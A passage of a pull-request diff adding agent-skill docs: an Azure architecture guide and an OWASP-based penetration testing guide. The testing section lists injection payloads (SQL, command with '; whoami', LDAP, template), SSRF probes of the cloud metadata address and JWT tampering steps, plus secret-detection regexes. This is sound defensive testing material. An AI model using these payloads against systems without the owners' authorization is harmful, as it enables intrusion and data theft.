Merge pull request #407 from alirezarezvani/feature/sprint-phase-2-cloud
feat(engineering-team): add azure-cloud-architect, security-pen-testing; extend terraform-patterns
462 docs/skills/engineering-team/azure-cloud-architect.md (new file)
@@ -0,0 +1,462 @@
---
title: "Azure Cloud Architect — Agent Skill & Codex Plugin"
description: "Design Azure architectures for startups and enterprises. Use when asked to design Azure infrastructure, create Bicep/ARM templates, optimize Azure. Agent skill for Claude Code, Codex CLI, Gemini CLI, OpenClaw."
---

# Azure Cloud Architect

<div class="page-meta" markdown>
<span class="meta-badge">:material-code-braces: Engineering - Core</span>
<span class="meta-badge">:material-identifier: `azure-cloud-architect`</span>
<span class="meta-badge">:material-github: <a href="https://github.com/alirezarezvani/claude-skills/tree/main/engineering-team/azure-cloud-architect/SKILL.md">Source</a></span>
</div>

<div class="install-banner" markdown>
<span class="install-label">Install:</span> <code>claude /plugin install engineering-skills</code>
</div>

Design scalable, cost-effective Azure architectures for startups and enterprises with Bicep infrastructure-as-code templates.

---

## Workflow

### Step 1: Gather Requirements

Collect application specifications:

```
- Application type (web app, mobile backend, data pipeline, SaaS, microservices)
- Expected users and requests per second
- Budget constraints (monthly spend limit)
- Team size and Azure experience level
- Compliance requirements (GDPR, HIPAA, SOC 2, ISO 27001)
- Availability requirements (SLA, RPO/RTO)
- Region preferences (data residency, latency)
```

### Step 2: Design Architecture

Run the architecture designer to get pattern recommendations:

```bash
python scripts/architecture_designer.py \
  --app-type web_app \
  --users 10000 \
  --requirements '{"budget_monthly_usd": 500, "compliance": ["SOC2"]}'
```

**Example output:**

```json
{
  "recommended_pattern": "app_service_web",
  "service_stack": ["App Service", "Azure SQL", "Front Door", "Key Vault", "Entra ID"],
  "estimated_monthly_cost_usd": 280,
  "pros": ["Managed platform", "Built-in autoscale", "Deployment slots"],
  "cons": ["Less control than VMs", "Platform constraints", "Cold start on consumption plans"]
}
```

Select from recommended patterns:

- **App Service Web**: Front Door + App Service + Azure SQL + Redis Cache
- **Microservices on AKS**: AKS + Service Bus + Cosmos DB + API Management
- **Serverless Event-Driven**: Functions + Event Grid + Service Bus + Cosmos DB
- **Data Pipeline**: Data Factory + Synapse Analytics + Data Lake Storage + Event Hubs

See `references/architecture_patterns.md` for detailed pattern specifications.

**Validation checkpoint:** Confirm the recommended pattern matches the team's operational maturity and compliance requirements before proceeding to Step 3.

### Step 3: Generate IaC Templates

Create infrastructure-as-code for the selected pattern:

```bash
# Web app stack (Bicep)
python scripts/bicep_generator.py --arch-type web-app --output main.bicep
```

**Example Bicep output (core web app resources):**

```bicep
@description('The environment name')
param environment string = 'dev'

@description('The Azure region for resources')
param location string = resourceGroup().location

@description('The application name')
param appName string = 'myapp'

// App Service Plan
resource appServicePlan 'Microsoft.Web/serverfarms@2023-01-01' = {
  name: '${environment}-${appName}-plan'
  location: location
  sku: {
    name: 'P1v3'
    tier: 'PremiumV3'
    capacity: 1
  }
  properties: {
    reserved: true // Linux
  }
}

// App Service
resource appService 'Microsoft.Web/sites@2023-01-01' = {
  name: '${environment}-${appName}-web'
  location: location
  properties: {
    serverFarmId: appServicePlan.id
    httpsOnly: true
    siteConfig: {
      linuxFxVersion: 'NODE|20-lts'
      minTlsVersion: '1.2'
      ftpsState: 'Disabled'
      alwaysOn: true
    }
  }
  identity: {
    type: 'SystemAssigned'
  }
}

// Azure SQL Database
resource sqlServer 'Microsoft.Sql/servers@2023-05-01-preview' = {
  name: '${environment}-${appName}-sql'
  location: location
  properties: {
    administrators: {
      azureADOnlyAuthentication: true
    }
    minimalTlsVersion: '1.2'
  }
}

resource sqlDatabase 'Microsoft.Sql/servers/databases@2023-05-01-preview' = {
  parent: sqlServer
  name: '${appName}-db'
  location: location
  sku: {
    name: 'GP_S_Gen5_2'
    tier: 'GeneralPurpose'
  }
  properties: {
    autoPauseDelay: 60
    minCapacity: json('0.5')
  }
}
```

> Full templates including Front Door, Key Vault, Managed Identity, and monitoring are generated by `bicep_generator.py` and also available in `references/architecture_patterns.md`.

**Bicep is the recommended IaC language for Azure.** Prefer Bicep over ARM JSON templates: Bicep compiles to ARM JSON, has cleaner syntax, supports modules, and is first-party supported by Microsoft.

### Step 4: Review Costs

Analyze estimated costs and optimization opportunities:

```bash
python scripts/cost_optimizer.py \
  --config current_resources.json \
  --json
```

**Example output:**

```json
{
  "current_monthly_usd": 2000,
  "recommendations": [
    { "action": "Right-size SQL Database GP_S_Gen5_8 to GP_S_Gen5_2", "savings_usd": 380, "priority": "high" },
    { "action": "Purchase 1-year Reserved Instances for AKS node pools", "savings_usd": 290, "priority": "high" },
    { "action": "Move Blob Storage to Cool tier for objects >30 days old", "savings_usd": 65, "priority": "medium" }
  ],
  "total_potential_savings_usd": 735
}
```

Output includes:

- Monthly cost breakdown by service
- Right-sizing recommendations
- Reserved Instance and Savings Plan opportunities
- Potential monthly savings
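The recommendations array can be triaged mechanically. A short sketch that sorts the optimizer's sample output (field names as shown in the example above) by priority and then by savings, so the team can work the list top to bottom:

```python
import json

# Example cost_optimizer.py output from Step 4 (abridged); field names
# follow the sample output above.
report = json.loads("""
{
  "current_monthly_usd": 2000,
  "recommendations": [
    {"action": "Right-size SQL Database GP_S_Gen5_8 to GP_S_Gen5_2", "savings_usd": 380, "priority": "high"},
    {"action": "Purchase 1-year Reserved Instances for AKS node pools", "savings_usd": 290, "priority": "high"},
    {"action": "Move Blob Storage to Cool tier for objects >30 days old", "savings_usd": 65, "priority": "medium"}
  ],
  "total_potential_savings_usd": 735
}
""")

# Order actions: high priority first, then by largest savings.
rank = {"high": 0, "medium": 1, "low": 2}
ordered = sorted(report["recommendations"],
                 key=lambda r: (rank[r["priority"]], -r["savings_usd"]))

savings = sum(r["savings_usd"] for r in ordered)
pct = 100 * savings / report["current_monthly_usd"]
for r in ordered:
    print(f'[{r["priority"]}] ${r["savings_usd"]}/mo: {r["action"]}')
print(f"Potential savings: ${savings}/mo ({pct:.0f}% of current spend)")
```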

### Step 5: Configure CI/CD

Set up Azure DevOps Pipelines or GitHub Actions with Azure:

```yaml
# GitHub Actions — deploy Bicep to Azure
name: Deploy Infrastructure
on:
  push:
    branches: [main]

permissions:
  id-token: write
  contents: read

jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - uses: azure/login@v2
        with:
          client-id: ${{ secrets.AZURE_CLIENT_ID }}
          tenant-id: ${{ secrets.AZURE_TENANT_ID }}
          subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }}

      - uses: azure/arm-deploy@v2
        with:
          resourceGroupName: rg-myapp-dev
          template: ./infra/main.bicep
          parameters: environment=dev
```

```yaml
# Azure DevOps Pipeline
trigger:
  branches:
    include:
      - main

pool:
  vmImage: 'ubuntu-latest'

steps:
  - task: AzureCLI@2
    inputs:
      azureSubscription: 'MyServiceConnection'
      scriptType: 'bash'
      scriptLocation: 'inlineScript'
      inlineScript: |
        az deployment group create \
          --resource-group rg-myapp-dev \
          --template-file infra/main.bicep \
          --parameters environment=dev
```

### Step 6: Security Review

Validate security posture before production:

- **Identity**: Entra ID (Azure AD) with RBAC, Managed Identity for service-to-service auth — never store credentials in code
- **Secrets**: Key Vault for all secrets, certificates, and connection strings
- **Network**: NSGs on all subnets, Private Endpoints for PaaS services, Application Gateway with WAF
- **Encryption**: TLS 1.2+ in transit, Azure-managed or customer-managed keys at rest
- **Monitoring**: Microsoft Defender for Cloud enabled, Azure Policy for guardrails
- **Compliance**: Azure Policy assignments for SOC 2 / HIPAA / ISO 27001 initiatives

**If deployment fails:**

1. Check the deployment status:

   ```bash
   az deployment group show \
     --resource-group rg-myapp-dev \
     --name main \
     --query 'properties.error'
   ```

2. Review the Activity Log for RBAC or policy errors.

3. Validate the Bicep template before deploying:

   ```bash
   az bicep build --file main.bicep
   az deployment group validate \
     --resource-group rg-myapp-dev \
     --template-file main.bicep
   ```

**Common failure causes:**

- RBAC permission errors — verify the deploying principal has Contributor on the resource group
- Resource provider not registered — run `az provider register --namespace Microsoft.Web`
- Naming conflicts — many Azure resource names must be globally unique (storage accounts, web apps)
- Quota exceeded — request a quota increase via Azure Portal > Subscriptions > Usage + quotas

---

## Tools

### architecture_designer.py

Generates architecture pattern recommendations based on requirements.

```bash
python scripts/architecture_designer.py \
  --app-type web_app \
  --users 50000 \
  --requirements '{"budget_monthly_usd": 1000, "compliance": ["HIPAA"]}' \
  --json
```

**Input:** Application type, expected users, JSON requirements
**Output:** Recommended pattern, service stack, cost estimate, pros/cons

### cost_optimizer.py

Analyzes Azure resource configurations for cost savings.

```bash
python scripts/cost_optimizer.py --config resources.json --json
```

**Input:** JSON file with current Azure resource inventory
**Output:** Recommendations for:

- Idle resource removal
- VM and database right-sizing
- Reserved Instance purchases
- Storage tier transitions
- Unused public IPs and load balancers

### bicep_generator.py

Generates Bicep template scaffolds from architecture type.

```bash
python scripts/bicep_generator.py --arch-type microservices --output main.bicep
```

**Output:** Production-ready Bicep templates with:

- Managed Identity (no passwords)
- Key Vault integration
- Diagnostic settings for Azure Monitor
- Network security groups
- Tags for cost allocation

---

## Quick Start

### Web App Architecture (< $100/month)

```
Ask: "Design an Azure web app for a startup with 5000 users"

Result:
- App Service (B1 Linux) for the application
- Azure SQL Serverless for relational data
- Azure Blob Storage for static assets
- Front Door (free tier) for CDN and routing
- Key Vault for secrets
- Estimated: $40-80/month
```

### Microservices on AKS ($500-2000/month)

```
Ask: "Design a microservices architecture on Azure for a SaaS platform with 50k users"

Result:
- AKS cluster with 3 node pools (system, app, jobs)
- API Management for gateway and rate limiting
- Cosmos DB for multi-model data
- Service Bus for async messaging
- Azure Monitor + Application Insights for observability
- Multi-zone deployment
```

### Serverless Event-Driven (< $200/month)

```
Ask: "Design an event-driven backend for processing orders"

Result:
- Azure Functions (Consumption plan) for compute
- Event Grid for event routing
- Service Bus for reliable messaging
- Cosmos DB for order data
- Application Insights for monitoring
- Estimated: $30-150/month depending on volume
```

### Data Pipeline ($300-1500/month)

```
Ask: "Design a data pipeline for ingesting 10M events/day"

Result:
- Event Hubs for ingestion
- Stream Analytics or Functions for processing
- Data Lake Storage Gen2 for raw data
- Synapse Analytics for warehouse
- Power BI for dashboards
```

---

## Input Requirements

Provide these details for architecture design:

| Requirement | Description | Example |
|-------------|-------------|---------|
| Application type | What you're building | SaaS platform, mobile backend |
| Expected scale | Users, requests/sec | 10k users, 100 RPS |
| Budget | Monthly Azure limit | $500/month max |
| Team context | Size, Azure experience | 3 devs, intermediate |
| Compliance | Regulatory needs | HIPAA, GDPR, SOC 2 |
| Availability | Uptime requirements | 99.9% SLA, 1hr RPO |

**JSON Format:**

```json
{
  "application_type": "saas_platform",
  "expected_users": 10000,
  "requests_per_second": 100,
  "budget_monthly_usd": 500,
  "team_size": 3,
  "azure_experience": "intermediate",
  "compliance": ["SOC2"],
  "availability_sla": "99.9%"
}
```

---

## Anti-Patterns

| Anti-Pattern | Why It Fails | Do This Instead |
|---|---|---|
| ARM JSON templates for new projects | Verbose, hard to read, no modules | Use Bicep — compiles to ARM, cleaner syntax |
| Storing secrets in App Settings | Secrets visible in portal, no rotation | Use Key Vault references in App Settings |
| Single large AKS node pool | Cannot optimize for different workloads | Use multiple node pools: system, app, jobs |
| Public endpoints on PaaS services | Exposed attack surface | Use Private Endpoints + VNet integration |
| Over-provisioning "just in case" | Wastes budget from month one | Start small, use autoscale, right-size monthly |
| Shared resource groups for everything | Blast radius, RBAC nightmares | One resource group per environment per workload |
| No tagging strategy | Cannot track costs or ownership | Tag: environment, owner, cost-center, app-name |
| Using classic resources | Deprecated, limited features | Use ARM/Bicep resources exclusively |

---

## Output Formats

### Architecture Design

- Pattern recommendation with rationale
- Service stack diagram (ASCII)
- Monthly cost estimate and trade-offs

### IaC Templates

- **Bicep**: Recommended — first-party, module support, clean syntax
- **ARM JSON**: Generated from Bicep when needed
- **Terraform HCL**: Multi-cloud compatible using the azurerm provider

### Cost Analysis

- Current spend breakdown with optimization recommendations
- Priority action list (high/medium/low) and implementation checklist

---

## Reference Documentation

| Document | Contents |
|----------|----------|
| `references/architecture_patterns.md` | 5 patterns: web app, microservices/AKS, serverless, data pipeline, multi-region |
| `references/service_selection.md` | Decision matrices for compute, database, storage, messaging, networking |
| `references/best_practices.md` | Naming conventions, tagging, RBAC, network security, monitoring, DR |
@@ -1,13 +1,13 @@
 ---
 title: "Engineering - Core Skills — Agent Skills & Codex Plugins"
-description: "41 engineering - core skills — engineering agent skill and Claude Code plugin for code generation, DevOps, architecture, and testing. Works with Claude Code, Codex CLI, Gemini CLI, and OpenClaw."
+description: "43 engineering - core skills — engineering agent skill and Claude Code plugin for code generation, DevOps, architecture, and testing. Works with Claude Code, Codex CLI, Gemini CLI, and OpenClaw."
 ---

 <div class="domain-header" markdown>

 # :material-code-braces: Engineering - Core

-<p class="domain-count">41 skills in this domain</p>
+<p class="domain-count">43 skills in this domain</p>

 </div>

@@ -29,6 +29,12 @@ description: "41 engineering - core skills — engineering agent skill and Claud

 Design scalable, cost-effective AWS architectures for startups with infrastructure-as-code templates.

+- **[Azure Cloud Architect](azure-cloud-architect.md)**
+
+---
+
+Design scalable, cost-effective Azure architectures for startups and enterprises with Bicep infrastructure-as-code te...
+
 - **[Code Reviewer](code-reviewer.md)**

 ---

@@ -77,6 +83,12 @@ description: "41 engineering - core skills — engineering agent skill and Claud

 Production-grade Playwright testing toolkit for AI coding agents.

+- **[Security Penetration Testing](security-pen-testing.md)**
+
+---
+
+Hands-on offensive security testing skill for finding vulnerabilities before attackers do. This is NOT compliance che...
+
 - **[Self-Improving Agent](self-improving-agent.md)** + 5 sub-skills

 ---
861 docs/skills/engineering-team/security-pen-testing.md (new file)
@@ -0,0 +1,861 @@
---
title: "Security Penetration Testing — Agent Skill & Codex Plugin"
description: "Use when the user asks to perform security audits, penetration testing, vulnerability scanning, OWASP Top 10 checks, or offensive security. Agent skill for Claude Code, Codex CLI, Gemini CLI, OpenClaw."
---

# Security Penetration Testing

<div class="page-meta" markdown>
<span class="meta-badge">:material-code-braces: Engineering - Core</span>
<span class="meta-badge">:material-identifier: `security-pen-testing`</span>
<span class="meta-badge">:material-github: <a href="https://github.com/alirezarezvani/claude-skills/tree/main/engineering-team/security-pen-testing/SKILL.md">Source</a></span>
</div>

<div class="install-banner" markdown>
<span class="install-label">Install:</span> <code>claude /plugin install engineering-skills</code>
</div>

Hands-on offensive security testing skill for finding vulnerabilities before attackers do. This is NOT compliance checking (see senior-secops) or security policy writing (see senior-security) — this is about systematic vulnerability discovery through authorized testing.

---

## Table of Contents

- [Overview](#overview)
- [OWASP Top 10 Systematic Audit](#owasp-top-10-systematic-audit)
- [Static Analysis](#static-analysis)
- [Dependency Vulnerability Scanning](#dependency-vulnerability-scanning)
- [Secret Scanning](#secret-scanning)
- [API Security Testing](#api-security-testing)
- [Web Vulnerability Testing](#web-vulnerability-testing)
- [Infrastructure Security](#infrastructure-security)
- [Pen Test Report Generation](#pen-test-report-generation)
- [Responsible Disclosure Workflow](#responsible-disclosure-workflow)
- [Workflows](#workflows)
- [Anti-Patterns](#anti-patterns)
- [Cross-References](#cross-references)

---

## Overview

### What This Skill Does

This skill provides the methodology, checklists, and automation for **offensive security testing** — actively probing systems to discover exploitable vulnerabilities. It covers web applications, APIs, infrastructure, and supply chain security.

### Distinction from Other Security Skills

| Skill | Focus | Approach |
|-------|-------|----------|
| **security-pen-testing** (this) | Finding vulnerabilities | Offensive — simulate attacker techniques |
| senior-secops | Security operations | Defensive — monitoring, incident response, SIEM |
| senior-security | Security policy | Governance — policies, frameworks, risk registers |
| skill-security-auditor | CI/CD gates | Automated — pre-merge security checks |

### Prerequisites

All testing described here assumes **written authorization** from the system owner. Unauthorized testing is illegal under the CFAA and equivalent laws worldwide. Always obtain a signed scope-of-work or rules-of-engagement document before starting.

---

## OWASP Top 10 Systematic Audit

Use the vulnerability scanner tool for automated checklist generation:

```bash
# Generate OWASP checklist for a web application
python scripts/vulnerability_scanner.py --target web --scope full

# Quick API-focused scan
python scripts/vulnerability_scanner.py --target api --scope quick --json
```

### A01:2021 — Broken Access Control

**Test Procedures:**

1. Attempt horizontal privilege escalation: access another user's resources by changing IDs
2. Test vertical escalation: access admin endpoints with regular user tokens
3. Verify CORS configuration — check `Access-Control-Allow-Origin` for wildcards
4. Test forced browsing to admin pages (`/admin`, `/api/admin`, `/debug`)
5. Modify JWT claims (`role`, `is_admin`) and replay tokens

**What to Look For:**

- Missing authorization checks on API endpoints
- Predictable resource IDs (sequential integers vs. UUIDs)
- Client-side only access controls (hidden UI elements without server checks)
- CORS misconfigurations allowing arbitrary origins
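
Step 5 (claim tampering) can be sketched in a few lines. The token below is a made-up demo value, not from any real system; the point is that if the server accepts the re-encoded payload, authorization is broken:

```python
import base64
import json

# Build a sample token (header.payload.signature); the payload segment
# is what step 5 above tampers with.
header = base64.urlsafe_b64encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode()).rstrip(b"=")
payload = base64.urlsafe_b64encode(json.dumps({"sub": "1234", "role": "user"}).encode()).rstrip(b"=")
token = b".".join([header, payload, b"sig"]).decode()

def decode_segment(seg: str) -> dict:
    # JWT segments are base64url without padding; restore padding first
    seg += "=" * (-len(seg) % 4)
    return json.loads(base64.urlsafe_b64decode(seg))

claims = decode_segment(token.split(".")[1])
claims["role"] = "admin"  # tampered claim to replay against the API

forged_payload = base64.urlsafe_b64encode(json.dumps(claims).encode()).rstrip(b"=").decode()
# Signature dropped; a server that skips verification will accept this.
forged = token.split(".")[0] + "." + forged_payload + "."

print(claims)
```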

### A02:2021 — Cryptographic Failures

**Test Procedures:**

1. Check TLS version — reject anything below TLS 1.2
2. Verify password hashing: bcrypt/scrypt/argon2 with adequate cost factor
3. Look for sensitive data in URLs (tokens in query params get logged)
4. Check for hardcoded encryption keys in source code
5. Test for weak random number generation (Math.random() for tokens)

**What to Look For:**

- MD5/SHA1 used for password hashing
- Secrets in environment variables without encryption at rest
- Missing `Strict-Transport-Security` header
- Self-signed certificates in production
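
The "nothing below TLS 1.2" policy from step 1 can be expressed directly with Python's `ssl` module; verifying a live endpoint needs a network connection, so this sketch only shows the client-side policy:

```python
import ssl

# Configure a client context that refuses TLS 1.0/1.1 handshakes outright.
ctx = ssl.create_default_context()
ctx.minimum_version = ssl.TLSVersion.TLSv1_2

print("client will refuse TLS handshakes below 1.2:",
      ctx.minimum_version >= ssl.TLSVersion.TLSv1_2)
```

To probe a live endpoint from the outside, `openssl s_client -connect host:443 -tls1_2` should succeed while the `-tls1_1` variant should fail.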

### A03:2021 — Injection

**Test Procedures:**

1. SQL injection: test all input fields with `' OR 1=1--` and time-based payloads
2. NoSQL injection: test with `{"$gt": ""}` and `{"$ne": null}` in JSON bodies
3. Command injection: test inputs with `; whoami` and backtick substitution
4. LDAP injection: test with `*)(uid=*))(|(uid=*`
5. Template injection: test with `{{7*7}}` and `${7*7}`

**What to Look For:**

- String concatenation in SQL queries
- User input passed to `eval()`, `exec()`, `os.system()`
- Unparameterized ORM queries
- Template engines rendering user input without sandboxing
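
The first item above is easy to demonstrate against a throwaway SQLite database; a minimal, self-contained illustration of why the `' OR 1=1--` payload from step 1 works:

```python
import sqlite3

# Toy table standing in for the system under test.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (name TEXT, secret TEXT)")
db.execute("INSERT INTO users VALUES ('alice', 's3cr3t'), ('bob', 'hunter2')")

payload = "' OR 1=1--"

# Vulnerable: attacker-controlled string spliced into the SQL text.
leaked = db.execute(
    "SELECT * FROM users WHERE name = '" + payload + "'").fetchall()
print("concatenated query returned", len(leaked), "rows")  # every row leaks

# Safe: a placeholder keeps the payload as a plain value.
rows = db.execute(
    "SELECT * FROM users WHERE name = ?", (payload,)).fetchall()
print("parameterized query returned", len(rows), "rows")  # no match
```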

### A04:2021 — Insecure Design

**Test Procedures:**

1. Review business logic flows for abuse scenarios (e.g., negative quantities in carts)
2. Check rate limiting on sensitive operations (login, password reset, OTP)
3. Test multi-step flows for state manipulation (skip payment step)
4. Verify security questions aren't guessable

**What to Look For:**

- Missing rate limits on authentication endpoints
- Business logic that trusts client-side calculations
- Lack of account lockout after failed attempts
- Missing CAPTCHA on public-facing forms

### A05:2021 — Security Misconfiguration

**Test Procedures:**

1. Check for default credentials on admin panels
2. Verify unnecessary HTTP methods are disabled (TRACE, DELETE on public endpoints)
3. Check error handling — stack traces should never leak to users
4. Review HTTP security headers (CSP, X-Frame-Options, X-Content-Type-Options)
5. Check directory listing is disabled

**What to Look For:**

- Debug mode enabled in production
- Default admin:admin credentials
- Verbose error messages with stack traces
- Missing security headers
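
The header review in step 4 reduces to set arithmetic over the response headers. A sketch with a sample header dict (the header names are the standard ones; the response values are made up):

```python
# Security headers a hardened response is expected to carry.
REQUIRED = {
    "Strict-Transport-Security",
    "Content-Security-Policy",
    "X-Frame-Options",
    "X-Content-Type-Options",
}

def missing_headers(headers: dict) -> set:
    # Header names are case-insensitive; normalize before comparing.
    present = {name.title() for name in headers}
    return {h for h in REQUIRED if h.title() not in present}

# Stand-in for a real response (e.g. the output of `curl -sI <target>`).
response_headers = {
    "content-type": "text/html",
    "strict-transport-security": "max-age=63072000",
    "x-frame-options": "DENY",
}
print(sorted(missing_headers(response_headers)))
```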

### A06:2021 — Vulnerable and Outdated Components

**Test Procedures:**

1. Run dependency audit against known CVE databases
2. Check for end-of-life frameworks and libraries
3. Verify transitive dependency versions
4. Check for known vulnerable versions (e.g., Log4j 2.0-2.14.1)

```bash
# Audit a package manifest
python scripts/dependency_auditor.py --file package.json --severity high
python scripts/dependency_auditor.py --file requirements.txt --json
```

### A07:2021 — Identification and Authentication Failures

**Test Procedures:**

1. Test brute force protection on login endpoints
2. Check password policy enforcement (minimum length, complexity)
3. Verify session invalidation on logout and password change
4. Test "remember me" token security (HttpOnly, Secure, SameSite flags)
5. Check multi-factor authentication bypass paths

**What to Look For:**

- Sessions that persist after logout
- Missing `HttpOnly` and `Secure` flags on session cookies
- Password reset tokens that don't expire
- Username enumeration via different error messages
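
The lockout behavior that step 1 and the "lack of account lockout" item probe for can be modeled in a few lines; `Authenticator` here is a toy stand-in for the system under test, not a real service:

```python
class Authenticator:
    """Toy model of a login endpoint with brute-force lockout."""
    MAX_FAILURES = 5

    def __init__(self, password: str):
        self._password = password
        self._failures = 0

    def login(self, attempt: str) -> str:
        if self._failures >= self.MAX_FAILURES:
            return "locked"          # what a hardened endpoint should return
        if attempt == self._password:
            self._failures = 0
            return "ok"
        self._failures += 1
        return "denied"

auth = Authenticator("correct horse")
results = [auth.login(f"guess-{i}") for i in range(7)]
print(results)  # lockout kicks in after the fifth failure
```

During a test, an endpoint that keeps returning "denied" past any sensible threshold is reportable: unlimited guesses make credential stuffing practical.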

### A08:2021 — Software and Data Integrity Failures

**Test Procedures:**

1. Check for unsigned updates or deployment artifacts
2. Verify CI/CD pipeline integrity (signed commits, protected branches)
3. Test deserialization endpoints with crafted payloads
4. Check for SRI (Subresource Integrity) on CDN-loaded scripts

**What to Look For:**

- Unsafe deserialization of user input (pickle, Java serialization)
- Missing integrity checks on downloaded artifacts
- CI/CD pipelines running untrusted code
- CDN scripts without SRI hashes

### A09:2021 — Security Logging and Monitoring Failures

**Test Procedures:**

1. Verify authentication events are logged (success and failure)
2. Check that logs don't contain sensitive data (passwords, tokens, PII)
3. Test alerting thresholds (do 50 failed logins trigger an alert?)
4. Verify log integrity — can an attacker tamper with logs?

**What to Look For:**

- Missing audit trail for admin actions
- Passwords or tokens appearing in logs
- No alerting on suspicious patterns
- Logs stored without integrity protection

### A10:2021 — Server-Side Request Forgery (SSRF)

**Test Procedures:**

1. Test URL input fields with internal addresses (`http://169.254.169.254/` for cloud metadata)
2. Check for open redirect chains that reach internal services
3. Test with DNS rebinding payloads
4. Verify allowlist validation on outbound requests

**What to Look For:**

- User-controlled URLs passed to `fetch()`, `requests.get()`, `curl`
- Missing allowlist on outbound HTTP requests
- Ability to reach cloud metadata endpoints (AWS, GCP, Azure)
- PDF generators or screenshot services that fetch arbitrary URLs
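
The validation from step 4 can be sketched with the standard library. This toy check only handles literal IP addresses and deliberately ignores DNS; a real defense must also resolve hostnames and re-check after every redirect, or DNS rebinding sidesteps it:

```python
import ipaddress
from urllib.parse import urlsplit

def is_blocked(url: str) -> bool:
    """Reject URLs whose host is a private, loopback, or link-local IP
    (169.254.169.254 is the cloud metadata endpoint)."""
    host = urlsplit(url).hostname or ""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # hostname, not a literal IP; needs resolution first
    return ip.is_private or ip.is_loopback or ip.is_link_local

print(is_blocked("http://169.254.169.254/latest/meta-data/"))  # True
print(is_blocked("http://10.0.0.5/admin"))                     # True
print(is_blocked("https://example.com/report"))                # False
```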
|
||||
|
||||
---
|
||||
|
||||
## Static Analysis
|
||||
|
||||
### CodeQL Custom Rules
|
||||
|
||||
Write custom CodeQL queries for project-specific vulnerability patterns:
|
||||
|
||||
```ql
|
||||
/**
|
||||
* Detect SQL injection via string concatenation
|
||||
*/
|
||||
import python
|
||||
import semmle.python.dataflow.new.DataFlow
|
||||
|
||||
from Call call, StringFormatting fmt
|
||||
where
|
||||
call.getFunc().getName() = "execute" and
|
||||
fmt = call.getArg(0) and
|
||||
exists(DataFlow::Node source |
|
||||
source.asExpr() instanceof Name and
|
||||
DataFlow::localFlow(source, DataFlow::exprNode(fmt.getAnOperand()))
|
||||
)
|
||||
select call, "Potential SQL injection: user input flows into execute()"
|
||||
```
|
||||
|
||||
### Semgrep Custom Rules
|
||||
|
||||
Create project-specific Semgrep rules:
|
||||
|
||||
```yaml
|
||||
rules:
|
||||
- id: hardcoded-jwt-secret
|
||||
pattern: |
|
||||
jwt.encode($PAYLOAD, "...", ...)
|
||||
message: "JWT signed with hardcoded secret"
|
||||
severity: ERROR
|
||||
languages: [python]
|
||||
|
||||
- id: unsafe-yaml-load
|
||||
pattern: yaml.load($DATA)
|
||||
fix: yaml.safe_load($DATA)
|
||||
message: "Use yaml.safe_load() to prevent arbitrary code execution"
|
||||
severity: WARNING
|
||||
languages: [python]
|
||||
|
||||
- id: express-no-helmet
|
||||
pattern: |
|
||||
const app = express();
|
||||
...
|
||||
app.listen(...)
|
||||
pattern-not: |
|
||||
const app = express();
|
||||
...
|
||||
app.use(helmet(...));
|
||||
...
|
||||
app.listen(...)
|
||||
message: "Express app missing helmet middleware for security headers"
|
||||
severity: WARNING
|
||||
languages: [javascript, typescript]
|
||||
```
|
||||
|
||||
### ESLint Security Plugins
|
||||
|
||||
Recommended configuration:
|
||||
|
||||
```json
|
||||
{
|
||||
"plugins": ["security", "no-unsanitized"],
|
||||
"extends": ["plugin:security/recommended"],
|
||||
"rules": {
|
||||
"security/detect-object-injection": "error",
|
||||
"security/detect-non-literal-regexp": "warn",
|
||||
"security/detect-unsafe-regex": "error",
|
||||
"security/detect-buffer-noassert": "error",
|
||||
"security/detect-eval-with-expression": "error",
|
||||
"no-unsanitized/method": "error",
|
||||
"no-unsanitized/property": "error"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
---

## Dependency Vulnerability Scanning

### Ecosystem-Specific Commands

```bash
# Node.js
npm audit --json | jq '.vulnerabilities | to_entries[] | select(.value.severity == "critical")'

# Python
pip-audit --format json --desc
safety check --json

# Go
govulncheck ./...

# Ruby
bundle audit check --update
```

### CVE Triage Workflow

1. **Collect**: Run ecosystem audit tools, aggregate findings
2. **Deduplicate**: Group by CVE ID across direct and transitive deps
3. **Score**: Use CVSS base score + environmental adjustments
4. **Prioritize**: Critical + exploitable + reachable = fix immediately
5. **Remediate**: Upgrade, patch, or mitigate with compensating controls
6. **Verify**: Rerun audit to confirm fix, update lock files

```bash
# Use the dependency auditor for automated triage
python scripts/dependency_auditor.py --file package.json --severity critical --json
```
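Steps 3 and 4 above can be sketched as a small helper that maps a CVSS v3.1 base score plus environmental context to a triage bucket (thresholds follow the CVSS qualitative scale; the bucket names are illustrative, not part of `dependency_auditor.py`):

```python
def triage(cvss_score: float, exploitable: bool, reachable: bool) -> str:
    """Map a CVSS v3.1 base score plus environment to a triage action."""
    if cvss_score >= 9.0:
        severity = "critical"
    elif cvss_score >= 7.0:
        severity = "high"
    elif cvss_score >= 4.0:
        severity = "medium"
    else:
        severity = "low"
    # Critical + exploitable + reachable = fix immediately
    if severity == "critical" and exploitable and reachable:
        return "fix-immediately"
    if severity in ("critical", "high"):
        return "fix-this-sprint"
    return "backlog"

print(triage(9.8, True, True))    # fix-immediately
print(triage(7.5, False, False))  # fix-this-sprint
```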
### Known Vulnerable Patterns

| Package | Vulnerable Versions | CVE | Impact |
|---------|---------------------|-----|--------|
| log4j-core | 2.0 - 2.14.1 | CVE-2021-44228 | RCE via JNDI injection |
| lodash | < 4.17.21 | CVE-2021-23337 | Command injection via template |
| axios | < 1.6.0 | CVE-2023-45857 | CSRF token exposure |
| pillow | < 9.3.0 | CVE-2022-45198 | DoS via crafted image |
| express | < 4.19.2 | CVE-2024-29041 | Open redirect |
---

## Secret Scanning

### TruffleHog Patterns

```bash
# Scan git history for secrets
trufflehog git file://. --only-verified --json

# Scan filesystem (no git history)
trufflehog filesystem . --json
```

### Gitleaks Configuration

```toml
# .gitleaks.toml
title = "Custom Gitleaks Config"

[[rules]]
id = "aws-access-key"
description = "AWS Access Key ID"
regex = '''AKIA[0-9A-Z]{16}'''
tags = ["aws", "credentials"]

[[rules]]
id = "generic-api-key"
description = "Generic API Key"
regex = '''(?i)(api[_-]?key|apikey)\s*[:=]\s*['\"][a-zA-Z0-9]{20,}['\"]'''
tags = ["api", "key"]

[[rules]]
id = "private-key"
description = "Private Key Header"
regex = '''-----BEGIN (RSA|EC|DSA|OPENSSH) PRIVATE KEY-----'''
tags = ["private-key"]

[allowlist]
